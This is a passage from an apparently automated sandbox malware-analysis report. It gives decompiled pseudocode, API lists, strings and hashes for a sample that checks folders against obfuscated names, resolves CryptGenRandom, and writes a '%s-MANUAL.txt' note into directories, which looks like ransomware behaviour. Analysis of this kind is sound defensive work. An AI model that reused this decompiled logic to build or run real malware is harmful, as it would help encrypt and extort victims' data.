				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				char _v408;
				char _v424;
				void* __ebx;
				void* _t121;
				intOrPtr* _t146;
				void* _t147;
				intOrPtr* _t148;
				void* _t149;
				intOrPtr* _t150;
				void* _t151;
				intOrPtr* _t152;
				void* _t153;
				void* _t182;

				E00405C38( &_v424, 0x201); // executed
				_t182 = E00405C7D( &_v424, 0x200);
				_v240 = 0x98ffdd4c;
				_v236 = 0x9d4cd51b;
				_v232 = 0x50ec1ce9;
				_v228 = 0xbfe5129c;
				_v224 = 0x5035b60f;
				_v220 = 0x5035b613;
				_v216 = 0xc889355a;
				_v212 = 0xa93ab977;
				_v208 = 0x7e7b0959;
				_v204 = 0x21c93db9;
				_v200 = 0xf62d256f;
				_v196 = 0x1a12e117;
				_v192 = 0xf851ef2;
				_t121 = E00407563( &_v240);
				_t181 = _a4;
				if(E0040C4EB(_a4, _t121) != 0) {
					L18:
					_t160 = 0;
				} else {
					_v188 = 0xaad880d8;
					_v184 = 0xd29b3b2c;
					_v180 = 0xf514b164;
					_v176 = 0x796003c7;
					_v172 = 0x8a2f2197;
					_v168 = 0x8a2f218d;
					_v164 = 0x296e77dd;
					_v160 = 0xed9bdb4c;
					_v156 = 0x1e54000d;
					_v152 = 0x5a54084d;
					_v148 = 0xde659eaf;
					_v144 = 0x1e93dbb7;
					_v140 = 0xb3a2;
					if(E0040C4EB(_t181, E00407563( &_v188)) != 0) {
						goto L18;
					} else {
						_v44 = 0x66b8795c;
						_v40 = 0x6856abc6;
						_v36 = 0x2d16e60e;
						_v32 = 0x1afb70f6;
						_v28 = 0x67a89d3a;
						_v24 = 0x67a89d34;
						_v20 = 0x24008c46;
						_v16 = 0xb8e6f641;
						_v12 = 0xa2d7c425;
						_v8 = 0x31a6;
						if(E0040C4EB(_t181, E00407563( &_v44)) != 0) {
							goto L18;
						} else {
							_v348 = 0x77720a77;
							_v344 = 0x97b026ea;
							_v340 = 0x844d4e23;
							_v336 = 0x633f4f3c;
							_v332 = 0x7e959766;
							_v328 = 0x7e959746;
							_v324 = 0x69ad4a04;
							_v320 = 0x787424c0;
							_v316 = 0x55e8152b;
							_v312 = 0xd15b6987;
							_v308 = 0xf86861a5;
							_v304 = 0xd7596767;
							_v300 = 0xbb14ee90;
							_v296 = 0x77fecb8;
							if(E0040C4EB(_t181, E00407563( &_v348)) == 0) {
								_v292 = 0x7084b925;
								_v288 = 0x8721c277;
								_v284 = 0x2ec052e2;
								_v280 = 0xdb4d3850;
								_v276 = 0xaabbe1d1;
								_v272 = 0xaabbe1cd;
								_v268 = 0xdc86af6d;
								_v264 = 0x2ae46858;
								_v260 = 0x58505592;
								_v256 = 0xf90deb52;
								_v252 = 0x3fc4b48b;
								_v248 = 0xe739df10;
								_v244 = 0xed98b930;
								if(E0040C4EB(_t181, E00407563( &_v292)) != 0) {
									goto L18;
								} else {
									_v136 = 0xa5ee9847;
									_v132 = 0xec56cb26;
									_t160 = 1;
									_v128 = 0xffa57a1f;
									_v124 = 0xfa6d543b;
									_v120 = 0x12a6e805;
									_v116 = 0x12a6e81d;
									_v112 = 0xc4aedd6a;
									_v108 = 0xc08;
									_v106 = 0x14;
									_v105 = 1;
									_v104 = 0x4127b16d;
									_v100 = 0xc89ec191;
									_v96 = 0xc5f27f5a;
									_v92 = 0x1d2eb23f;
									if(E0040C4EB(_t181, E00407563( &_v136)) != 0) {
										goto L18;
									} else {
										_v408 = 0xc1a3dbb0;
										_v404 = 0x656015cf;
										_v400 = 0x6a24ce08;
										_v396 = 0x51b5d74b;
										_v392 = 0x8e0d95ae;
										_v388 = 0x8e0d958c;
										_v384 = 0x75d60a4c;
										_v380 = 0x697d435d;
										_v376 = 0xedf4f264;
										_v372 = 0x879984a1;
										_v368 = 0x2f9d984a;
										_v364 = 0xf6885245;
										_v360 = 0x428b36ac;
										_v356 = 0xd8d09305;
										_v352 = 0x203a;
										if(E0040C4EB(_t181, E00407563( &_v408)) != 0) {
											goto L18;
										} else {
											_v88 = 0x6e8d0483;
											_v84 = 0xd6f9e899;
											_v80 = 0x28cf111e;
											_v76 = 0x865df085;
											_v72 = 0xd2bbad99;
											_v68 = 0xd2bbad8d;
											_v64 = 0x7ccaf4a3;
											_v60 = 0x7bcc5f7b;
											_v56 = 0x74e60416;
											_v52 = 0xed1a4e87;
											_v48 = 0x51cac63c;
											if(E0040C4EB(_t181, E00407563( &_v88)) != 0) {
												goto L18;
											} else {
												_t146 = E004010BB(1, 4, 0xc95d8546);
												_t147 =  *_t146(0, _t182, 0x2a, 0); // executed
												if(_t147 == 0 || E0040C4EB(_t181, _t182) == 0) {
													_t148 = E004010BB(_t160, 4, 0xc95d8546);
													_t149 =  *_t148(0, _t182, 0x2b, 0); // executed
													if(_t149 == 0 || E0040C4EB(_t181, _t182) == 0) {
														_t150 = E004010BB(_t160, 4, 0xc95d8546);
														_t151 =  *_t150(0, _t182, 0x24, 0); // executed
														if(_t151 == 0 || E0040C4EB(_t181, _t182) == 0) {
															_t152 = E004010BB(_t160, 4, 0xc95d8546);
															_t153 =  *_t152(0, _t182, 0x1c, 0); // executed
															if(_t153 != 0 && E0040C4EB(_t181, _t182) != 0) {
																goto L18;
															}
														} else {
															goto L18;
														}
													} else {
														goto L18;
													}
												} else {
													 *_a8 = 1;
													goto L18;
												}
											}
										}
									}
								}
							} else {
								 *_a8 = 1;
								goto L18;
							}
						}
					}
				}
				E00405C6C( &_v424);
				return _t160;
			}

0x00408fee
0x00409003
0x00409005
0x00409015
0x00409020
0x0040902a
0x00409034
0x0040903e
0x00409048
0x00409052
0x0040905c
0x00409066
0x00409070
0x0040907a
0x00409084
0x0040908e
0x00409093
0x004090a2
0x0040953b
0x0040953b
0x004090a8
0x004090ae
0x004090b9
0x004090c3
0x004090cd
0x004090d7
0x004090e1
0x004090eb
0x004090f5
0x004090ff
0x00409109
0x00409113
0x0040911d
0x00409127
0x00409141
0x00000000
0x00409147
0x0040914a
0x00409152
0x00409159
0x00409160
0x00409167
0x0040916e
0x00409175
0x0040917c
0x00409183
0x0040918a
0x004091a1
0x00000000
0x004091a7
0x004091ad
0x004091b8
0x004091c2
0x004091cc
0x004091d6
0x004091e0
0x004091ea
0x004091f4
0x004091fe
0x00409208
0x00409212
0x0040921c
0x00409226
0x00409230
0x0040924b
0x00409261
0x0040926c
0x00409276
0x00409280
0x0040928a
0x00409294
0x0040929e
0x004092a8
0x004092b2
0x004092bc
0x004092c6
0x004092d0
0x004092da
0x004092f5
0x00000000
0x004092fb
0x004092fd
0x0040930d
0x00409314
0x00409315
0x0040931d
0x00409324
0x0040932b
0x00409332
0x00409339
0x0040933f
0x00409343
0x00409346
0x0040934d
0x00409354
0x0040935b
0x00409373
0x00000000
0x00409379
0x0040937f
0x0040938a
0x00409394
0x0040939e
0x004093a8
0x004093b2
0x004093bc
0x004093c6
0x004093d0
0x004093da
0x004093e4
0x004093ee
0x004093f8
0x00409402
0x0040940c
0x00409426
0x00000000
0x0040942c
0x0040942f
0x00409437
0x0040943e
0x00409445
0x0040944c
0x00409453
0x0040945a
0x00409461
0x00409468
0x0040946f
0x00409476
0x0040948e
0x00000000
0x00409494
0x0040949b
0x004094a9
0x004094ad
0x004094ca
0x004094d8
0x004094dc
0x004094f2
0x00409500
0x00409504
0x0040951a
0x00409528
0x0040952c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004094bc
0x004094bf
0x00000000
0x004094bf
0x004094ad
0x0040948e
0x00409426
0x00409373
0x0040924d
0x00409250
0x00000000
0x00409250
0x0040924b
0x004091a1
0x00409141
0x00409543
0x00409550

APIs

Part of subcall function 00405C38: VirtualAlloc.KERNELBASE(00000000,0040C0AD,00003000,00000040,00000000,?,?,0040C0AD,?,?,?,?,?,?,?,0040165A), ref: 00405C55

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000), ref: 004094A9
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000), ref: 004094D8
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000), ref: 00409500
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00409528

Part of subcall function 00405C6C: VirtualFree.KERNELBASE(?,00000000,00008000,0040C1A3,?,?,?,?,?,?,0040165A,00000000,00000020,00000001,00000000), ref: 00405C76

Strings

: , xrefs: 0040940C
wrw, xrefs: 004091AD
Y{~, xrefs: 0040905C
<O?c, xrefs: 004091CC
]C}i, xrefs: 004093C6
Xh*, xrefs: 004092A8

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: FolderPathSpecial$Virtual$AllocFreeLibraryLoad
String ID: : $<O?c$Xh*$Y{~$]C}i$wrw
API String ID: 1948215442-4134126388
Opcode ID: 154d231cf67dee14b0323bd0e22805babb585622bde23758d3a9d9cbb60b5bf8
Instruction ID: 8b28af5f353a3d1383615ce35372efa066eca9e12853bce69ba4ae7604cc9ef5
Opcode Fuzzy Hash: 154d231cf67dee14b0323bd0e22805babb585622bde23758d3a9d9cbb60b5bf8
Instruction Fuzzy Hash: 8BD16BB0805329ABEB20DF569D81BEEBB74EF01304F5081EDE548BA385D7344A81CF5A

Uniqueness

Uniqueness Score: 100.00%

Function 0040BF81, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 66
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 53%

			E0040BF81(void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				void* __ebx;
				intOrPtr* _t19;
				void* _t20;
				struct HINSTANCE__* _t23;
				_Unknown_base(*)()* _t24;
				intOrPtr* _t25;
				void* _t37;

				_v12 = 0;
				_t19 = E004010BB(0, 5, 0x8ad7de22);
				_t20 =  *_t19( &_v8, 0, 0, 1, 0xf0000000); // executed
				if(_t20 == 0) {
					L6:
					return _v12;
				}
				_v44 = 0x70797243;
				_v40 = 0x6e654774;
				_v36 = 0x646e6152;
				_v32 = 0x6d6f;
				_v30 = 0;
				_v28 = 0x61766441;
				_v24 = 0x32336970;
				_v20 = 0x6c6c642e;
				_v16 = 0;
				_t23 = GetModuleHandleA( &_v28);
				if(_t23 != 0) {
					L3:
					_t24 = GetProcAddress(_t23,  &_v44);
					if(_t24 != 0) {
						 *_t24(_v8, 4,  &_v12);
					}
					L5:
					_t25 = E004010BB(0, 5, 0x72760bb8);
					 *_t25(_v8, 0, _t37);
					goto L6;
				}
				_t23 = LoadLibraryA( &_v28);
				if(_t23 == 0) {
					goto L5;
				}
				goto L3;
			}

0x0040bf91
0x0040bf94
0x0040bfa8
0x0040bfac
0x0040c035
0x0040c03c
0x0040c03c
0x0040bfb5
0x0040bfbd
0x0040bfc4
0x0040bfcb
0x0040bfd1
0x0040bfd4
0x0040bfdb
0x0040bfe2
0x0040bfe9
0x0040bfec
0x0040bff4
0x0040c004
0x0040c009
0x0040c011
0x0040c01c
0x0040c01c
0x0040c01e
0x0040c029
0x0040c032
0x00000000
0x0040c034
0x0040bffa
0x0040c002
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

GetModuleHandleA.KERNEL32(?), ref: 0040BFEC
LoadLibraryA.KERNEL32(61766441), ref: 0040BFFA
GetProcAddress.KERNEL32(00000000,70797243), ref: 0040C009

Strings

Cryp, xrefs: 0040BFB5
pi32, xrefs: 0040BFDB
.dll, xrefs: 0040BFE2
tGen, xrefs: 0040BFBD
om, xrefs: 0040BFCB
Rand, xrefs: 0040BFC4
Adva, xrefs: 0040BFD4

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: LibraryLoad$AddressHandleModuleProc
String ID: .dll$Adva$Cryp$Rand$om$pi32$tGen
API String ID: 3096387651-884858089
Opcode ID: 4feca0b10d1867f0347aef867250a1d1964061e065f93efa24c152aa7f20bc49
Instruction ID: b3c952fc6a531af14af6f4e51ec9bd562ccf98a5b2f008e72bfaa9c3604e5610
Opcode Fuzzy Hash: 4feca0b10d1867f0347aef867250a1d1964061e065f93efa24c152aa7f20bc49
Instruction Fuzzy Hash: 63113071904249EEDB14DFE5DC86BEFBB7CEF04350F104159EA00B6290EB749A44CB69

Uniqueness

Uniqueness Score: 100.00%

Function 00407F81, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
filestringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E00407F81(intOrPtr _a4) {
				long _v8;
				int _t5;
				intOrPtr _t6;
				void* _t8;
				int _t16;
				void* _t21;
				int _t28;
				int _t31;

				_t5 = E0040C6BA(0x400); // executed
				_t28 = _t5;
				if(_t28 != 0) {
					_t6 =  *0x41989c; // 0x65b0000
					if(_t6 != 0) {
						_t2 = _t28 + 0x200; // 0x200
						wsprintfW(_t2, L"%s\\%s-MANUAL.txt", _a4, _t6);
					}
					_t31 = 0;
					_t3 = _t28 + 0x200; // 0x200
					_t8 = CreateFileW(_t3, 0x40000000, 0, 0, 1, 0, 0); // executed
					_t21 = _t8;
					if(_t21 == 0xffffffff) {
						if(GetLastError() == 0x50) {
							goto L5;
						} else {
							if(GetLastError() != 5) {
								E0040C6D1(_t28); // executed
								_t5 = 0;
							} else {
								_t31 = 1;
								goto L5;
							}
						}
					} else {
						_t16 = WriteFile(_t21,  *0x419884, lstrlenW( *0x419884) + _t14,  &_v8, 0); // executed
						_t31 = _t16;
						CloseHandle(_t21);
						L5:
						E0040C6D1(_t28); // executed
						_t5 = _t31;
					}
				}
				return _t5;
			}

0x00407f8b
0x00407f90
0x00407f95
0x00407f9b
0x00407fa2
0x00407fa8
0x00407fb4
0x00407fba
0x00407fbf
0x00407fc1
0x00407fd3
0x00407fd9
0x00407fde
0x0040801f
0x00000000
0x00408021
0x00408026
0x0040802e
0x00408033
0x00408028
0x0040802a
0x00000000
0x0040802a
0x00408026
0x00407fe0
0x00407ffb
0x00408002
0x00408004
0x0040800a
0x0040800b
0x00408010
0x00408010
0x00408037
0x0040803c

APIs

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

wsprintfW.USER32 ref: 00407FB4
CreateFileW.KERNELBASE(00000200,40000000,00000000,00000000,00000001,00000000,00000000), ref: 00407FD3
lstrlenW.KERNEL32(00000000,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 00407FEB
WriteFile.KERNELBASE(00000000,00000000,?,?,00408ACF), ref: 00407FFB
CloseHandle.KERNEL32(00000000), ref: 00408004

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

GetLastError.KERNEL32(?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040801A
GetLastError.KERNEL32(?,?,00408ACF,?,00000000,00000000,00000000), ref: 00408021

Strings

%s\%s-MANUAL.txt, xrefs: 00407FAE

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: ErrorFileLastVirtual$AllocCloseCreateFreeHandleWritelstrlenwsprintf
String ID: %s\%s-MANUAL.txt
API String ID: 2956915494-1044697385
Opcode ID: 9ffc5cd1c3ef977e002fdf8c9634cfdbf28ec01402a1dff92a275cc27de343d6
Instruction ID: bc0a50f0ac71be01c6779fdb83d58a5d00fdb548046d05e7f6537b90a088ca58
Opcode Fuzzy Hash: 9ffc5cd1c3ef977e002fdf8c9634cfdbf28ec01402a1dff92a275cc27de343d6
Instruction Fuzzy Hash: 82113D72600114BBD71057B5DCC8EBB7B5CEB46764F00423AFA05E21B1DA358C1187BC

Uniqueness

Uniqueness Score: 100.00%

Function 00406310, Relevance: 10.7, APIs: 7, Instructions: 214
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406310(void* __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t120;
				intOrPtr _t123;
				intOrPtr _t126;
				intOrPtr* _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t144;
				intOrPtr _t146;
				intOrPtr _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t157;
				intOrPtr _t163;
				intOrPtr _t165;
				void* _t166;
				intOrPtr* _t167;
				intOrPtr* _t168;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr _t171;
				intOrPtr* _t172;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;

				_t162 = __edx;
				_t172 = _t154;
				_t117 =  *((intOrPtr*)(_t172 + 4));
				if( *((intOrPtr*)(_t117 + 4)) == 6 &&  *((intOrPtr*)(_t117 + 0x18)) != 1) {
					 *((intOrPtr*)(_t117 + 0x18)) =  *((intOrPtr*)(_t117 + 0x18)) - 1;
					E00405CE0(_t172, __edx, _t166,  *( *((intOrPtr*)(_t117 + 0x1c)) +  *((intOrPtr*)(_t117 + 0x18))) & 0x000000ff);
				}
				_t152 =  *((intOrPtr*)(_t172 + 4));
				 *((intOrPtr*)(_t173 + 0x10)) = _t152;
				_t118 =  *((intOrPtr*)(_t152 + 4));
				if(_t118 == 9 || _t118 == 0xe) {
					_t152 =  *((intOrPtr*)(_t152 + 0x14));
					 *((intOrPtr*)(_t173 + 0x10)) = _t152;
				}
				if( *((intOrPtr*)(_t173 + 0x18)) != 0) {
					L27:
					_t167 = E0041500C(_t162, __eflags, 0x18);
					_t174 = _t173 + 4;
					__eflags = _t167;
					if(__eflags == 0) {
						_t167 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t167 + 4)) = 0x13;
						 *((intOrPtr*)(_t167 + 8)) = 0;
						 *((intOrPtr*)(_t167 + 0xc)) = 0;
						 *((intOrPtr*)(_t167 + 0x10)) = 0;
						 *_t167 = 0x4375c0;
						 *((intOrPtr*)(_t167 + 0x14)) = 0;
					}
					_t120 = E0041500C(_t162, __eflags, 0x28); // executed
					_t175 = _t174 + 4;
					 *((intOrPtr*)(_t175 + 0x10)) = _t120;
					__eflags = _t120;
					if(_t120 == 0) {
						_t155 = 0;
						__eflags = 0;
					} else {
						_t163 =  *_t172;
						_t169 =  *((intOrPtr*)(_t163 + 0x18));
						 *((intOrPtr*)(_t163 + 0x18)) = _t169 + 1;
						_t155 = _t120;
						__eflags =  *((intOrPtr*)(_t175 + 0x20));
						_t130 =  !=  ? 2 : 0;
						 *((intOrPtr*)(_t155 + 4)) = 0x12;
						 *((intOrPtr*)(_t155 + 8)) =  !=  ? 2 : 0;
						 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t175 + 0x18));
						 *((intOrPtr*)(_t155 + 0xc)) = 0;
						 *((intOrPtr*)(_t155 + 0x10)) = 0;
						 *_t155 = 0x4375c8;
						 *((intOrPtr*)(_t155 + 0x18)) =  *((intOrPtr*)(_t175 + 0x1c));
						 *((intOrPtr*)(_t155 + 0x1c)) = _t167;
						 *((intOrPtr*)(_t155 + 0x20)) = _t169;
						 *((intOrPtr*)(_t155 + 0x24)) = 0xffffffff;
					}
					 *((intOrPtr*)(_t167 + 0x14)) = _t155;
					 *((intOrPtr*)(_t167 + 0x10)) =  *((intOrPtr*)(_t172 + 4));
					_t123 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + 4)) + 0xc));
					__eflags = _t123;
					if(_t123 != 0) {
						 *((intOrPtr*)(_t167 + 0xc)) = _t123;
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t172 + 4)) + 0xc)) + 0x10)) = _t167;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t172 + 4)) + 0xc)) = _t167;
					 *((intOrPtr*)(_t172 + 4)) = _t167;
					 *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x10)) + 0xc)) = _t155;
					_t126 =  *((intOrPtr*)(_t152 + 0x10));
					 *((intOrPtr*)(_t155 + 0x10)) = _t126;
					 *((intOrPtr*)(_t152 + 0x10)) = _t155;
					 *((intOrPtr*)(_t155 + 0xc)) = _t152;
					return _t126;
				} else {
					_t187 =  *((intOrPtr*)(_t173 + 0x1c)) - 1;
					if( *((intOrPtr*)(_t173 + 0x1c)) != 1) {
						goto L27;
					}
					_t170 = E0041500C(_t162, _t187, 0x14);
					_t176 = _t173 + 4;
					_t188 = _t170;
					if(_t170 == 0) {
						_t170 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t170 + 4)) = 0x11;
						 *((intOrPtr*)(_t170 + 8)) = 0;
						 *((intOrPtr*)(_t170 + 0xc)) = 0;
						 *((intOrPtr*)(_t170 + 0x10)) = 0;
						 *_t170 = 0x4375a4;
					}
					_t168 = E0041500C(_t162, _t188, 0x1c);
					_t177 = _t176 + 4;
					_t189 = _t168;
					if(_t168 == 0) {
						_t168 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t168 + 4)) = 0x10;
						 *((intOrPtr*)(_t168 + 8)) = 0;
						 *((intOrPtr*)(_t168 + 0xc)) = 0;
						 *((intOrPtr*)(_t168 + 0x10)) = 0;
						 *_t168 = 0x4375ac;
						 *((intOrPtr*)(_t168 + 0x14)) = _t170;
						 *((intOrPtr*)(_t168 + 0x18)) = 0;
					}
					_t153 = E0041500C(_t162, _t189, 0x1c);
					_t178 = _t177 + 4;
					_t190 = _t153;
					if(_t153 == 0) {
						_t153 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t153 + 4)) = 0x10;
						 *((intOrPtr*)(_t153 + 8)) = 0;
						 *((intOrPtr*)(_t153 + 0xc)) = 0;
						 *((intOrPtr*)(_t153 + 0x10)) = 0;
						 *_t153 = 0x4375ac;
						 *((intOrPtr*)(_t153 + 0x14)) = _t170;
						 *((intOrPtr*)(_t153 + 0x18)) = 0;
					}
					_t136 = E0041500C(_t162, _t190, 0x14);
					_t179 = _t178 + 4;
					 *((intOrPtr*)(_t179 + 0x18)) = _t136;
					_t191 = _t136;
					if(_t136 == 0) {
						 *((intOrPtr*)(_t179 + 0x18)) = 0;
					} else {
						 *_t136 = 0x437520;
						 *((intOrPtr*)(_t136 + 4)) = 8;
						 *((intOrPtr*)(_t136 + 8)) = 0;
						 *((intOrPtr*)(_t136 + 0xc)) = 0;
						 *((intOrPtr*)(_t136 + 0x10)) = 0;
					}
					_t157 = E0041500C(_t162, _t191, 0x18);
					_t180 = _t179 + 4;
					_t138 =  *((intOrPtr*)(_t180 + 0x18));
					if(_t157 == 0) {
						_t157 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t157 + 4)) = 9;
						 *((intOrPtr*)(_t157 + 8)) = 0;
						 *((intOrPtr*)(_t157 + 0xc)) = 0;
						 *((intOrPtr*)(_t157 + 0x10)) = 0;
						 *_t157 = 0x437554;
						 *((intOrPtr*)(_t157 + 0x14)) = _t138;
					}
					 *((intOrPtr*)(_t153 + 0xc)) = _t138;
					 *((intOrPtr*)(_t138 + 0x10)) = _t153;
					 *((intOrPtr*)(_t138 + 0xc)) = _t157;
					 *((intOrPtr*)(_t157 + 0x10)) = _t138;
					 *((intOrPtr*)(_t157 + 0xc)) = _t170;
					 *((intOrPtr*)(_t168 + 0x18)) = _t153;
					 *((intOrPtr*)(_t170 + 0x10)) =  *((intOrPtr*)(_t172 + 4));
					_t141 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + 4)) + 0xc));
					if(_t141 != 0) {
						 *((intOrPtr*)(_t170 + 0xc)) = _t141;
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t172 + 4)) + 0xc)) + 0x10)) = _t170;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t172 + 4)) + 0xc)) = _t170;
					 *((intOrPtr*)(_t172 + 4)) = _t170;
					_t171 =  *((intOrPtr*)(_t180 + 0x10));
					 *((intOrPtr*)( *((intOrPtr*)(_t171 + 0x10)) + 0xc)) = _t168;
					_t144 =  *((intOrPtr*)(_t171 + 0x10));
					 *((intOrPtr*)(_t168 + 0x10)) = _t144;
					 *((intOrPtr*)(_t171 + 0x10)) = _t168;
					 *((intOrPtr*)(_t168 + 0xc)) = _t171;
					if( *((char*)(_t180 + 0x20)) != 0) {
						return _t144;
					} else {
						_t165 =  *((intOrPtr*)(_t153 + 0xc));
						 *((intOrPtr*)(_t171 + 0x10)) =  *((intOrPtr*)(_t165 + 0x10));
						 *((intOrPtr*)(_t165 + 0x10)) =  *((intOrPtr*)(_t171 + 0x10));
						_t146 =  *((intOrPtr*)(_t153 + 0xc));
						 *((intOrPtr*)(_t168 + 0xc)) = _t146;
						 *((intOrPtr*)(_t153 + 0xc)) =  *((intOrPtr*)(_t168 + 0xc));
						return _t146;
					}
				}
			}

0x00406310
0x00406313
0x00406317
0x0040631e
0x00406326
0x00406336
0x00406336
0x0040633b
0x0040633e
0x00406342
0x00406348
0x0040634f
0x00406352
0x00406352
0x0040635b
0x00406518
0x0040651f
0x00406521
0x00406524
0x00406526
0x00406553
0x00406553
0x00406528
0x00406528
0x0040652f
0x00406536
0x0040653d
0x00406544
0x0040654a
0x0040654a
0x00406557
0x0040655c
0x0040655f
0x00406563
0x00406565
0x004065be
0x004065be
0x00406567
0x00406567
0x0040656a
0x00406570
0x00406573
0x0040657c
0x00406580
0x00406583
0x0040658a
0x00406591
0x00406598
0x0040659f
0x004065a6
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065c0
0x004065c6
0x004065cc
0x004065cf
0x004065d1
0x004065d3
0x004065dc
0x004065dc
0x004065e2
0x004065e5
0x004065eb
0x004065ee
0x004065f1
0x004065f4
0x004065f7
0x00000000
0x00406361
0x00406361
0x00406366
0x00000000
0x00000000
0x00406373
0x00406375
0x00406378
0x0040637a
0x004063a0
0x004063a0
0x0040637c
0x0040637c
0x00406383
0x0040638a
0x00406391
0x00406398
0x00406398
0x004063a9
0x004063ab
0x004063ae
0x004063b0
0x004063e0
0x004063e0
0x004063b2
0x004063b2
0x004063b9
0x004063c0
0x004063c7
0x004063ce
0x004063d4
0x004063d7
0x004063d7
0x004063e9
0x004063eb
0x004063ee
0x004063f0
0x00406420
0x00406420
0x004063f2
0x004063f2
0x004063f9
0x00406400
0x00406407
0x0040640e
0x00406414
0x00406417
0x00406417
0x00406424
0x00406429
0x0040642c
0x00406430
0x00406432
0x00406458
0x00406434
0x00406434
0x0040643a
0x00406441
0x00406448
0x0040644f
0x0040644f
0x00406467
0x00406469
0x0040646c
0x00406472
0x0040649b
0x0040649b
0x00406474
0x00406474
0x0040647b
0x00406482
0x00406489
0x00406490
0x00406496
0x00406496
0x0040649d
0x004064a0
0x004064a3
0x004064a6
0x004064a9
0x004064ac
0x004064b2
0x004064b8
0x004064bd
0x004064bf
0x004064c8
0x004064c8
0x004064d3
0x004064d6
0x004064d9
0x004064e0
0x004064e3
0x004064e6
0x004064e9
0x004064ec
0x004064ef
0x004065ff
0x004064f5
0x004064f5
0x004064fe
0x00406501
0x00406507
0x0040650a
0x00406510
0x00406515
0x00406515
0x004064ef

APIs

new.LIBCMT ref: 0040636E
new.LIBCMT ref: 004063A4
new.LIBCMT ref: 004063E4
new.LIBCMT ref: 00406424
new.LIBCMT ref: 00406462
new.LIBCMT ref: 0040651A

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

new.LIBCMT ref: 00406557

Part of subcall function 00405CE0: Concurrency::cancel_current_task.LIBCPMT ref: 00405D69

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 89a42def1f6311636d3f80eddad60635d86564a14ed6f448c4ad1872550a1e00
Instruction ID: 5ee5a59666300312f0b2db63460701908ef71bd823330166adc551700948ff7c
Opcode Fuzzy Hash: 89a42def1f6311636d3f80eddad60635d86564a14ed6f448c4ad1872550a1e00
